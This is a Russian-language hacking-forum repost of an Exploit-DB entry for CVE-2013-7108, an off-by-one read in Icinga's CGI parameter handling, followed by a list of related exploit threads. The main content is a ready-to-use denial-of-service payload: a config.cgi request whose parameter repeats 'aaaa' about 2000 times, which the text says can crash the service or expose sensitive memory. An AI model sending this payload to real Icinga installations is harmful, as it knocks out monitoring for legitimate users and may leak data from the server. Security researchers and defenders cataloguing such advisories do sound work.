Exploit Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 467 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 38882

Проверка EDB

Пройдено

Автор: DTAG GROUP INFORMATION SECURITY

Тип уязвимости: DOS

Платформа: CGI

CVE: cve-2013-7108

Дата публикации: 2013-12-16

Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service

Код:

source: https://www.securityfocus.com/bid/64363/info

Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition.

Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users. 

http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times]

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)

Ответы: 0

Просмотры: 744

Эксплойты & Уязвимости 21 Дек 2022

Exploit Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config

Ответы: 0

Просмотры: 785

Эксплойты & Уязвимости 21 Дек 2022

Exploit NTPsec 1.1.2 - 'config' (Authenticated) Out-of-Bounds Write Denial of Service (PoC)

Ответы: 0

Просмотры: 615

Эксплойты & Уязвимости 21 Дек 2022

Exploit KingCMS 0.6 - 'CONFIG[AdminPath]' Remote File Inclusion

Ответы: 0

Просмотры: 434

Эксплойты & Уязвимости 21 Дек 2022

Exploit Tagit! Tagit2b 2.1.B Build 2 - '/CONFIG/errmsg.inc.php?configpath' Remote File Inclusion

Ответы: 0

Просмотры: 411

Эксплойты & Уязвимости 21 Дек 2022

Exploit DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion

Ответы: 0

Просмотры: 395

Эксплойты & Уязвимости 21 Дек 2022

Exploit DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion

Ответы: 0

Просмотры: 377

Эксплойты & Уязвимости 21 Дек 2022

Exploit HotNews 0.x - 'config[incdir]' Remote File Inclusion

Ответы: 0

Просмотры: 372

Эксплойты & Уязвимости 21 Дек 2022

Exploit HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion

Ответы: 0

Просмотры: 364

Эксплойты & Уязвимости 21 Дек 2022

Exploit TP-Link TD-W89 Config File Download / Exploiting the Host

Ответы: 0

Просмотры: 831

Эксплойты & Уязвимости 21 Дек 2022

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.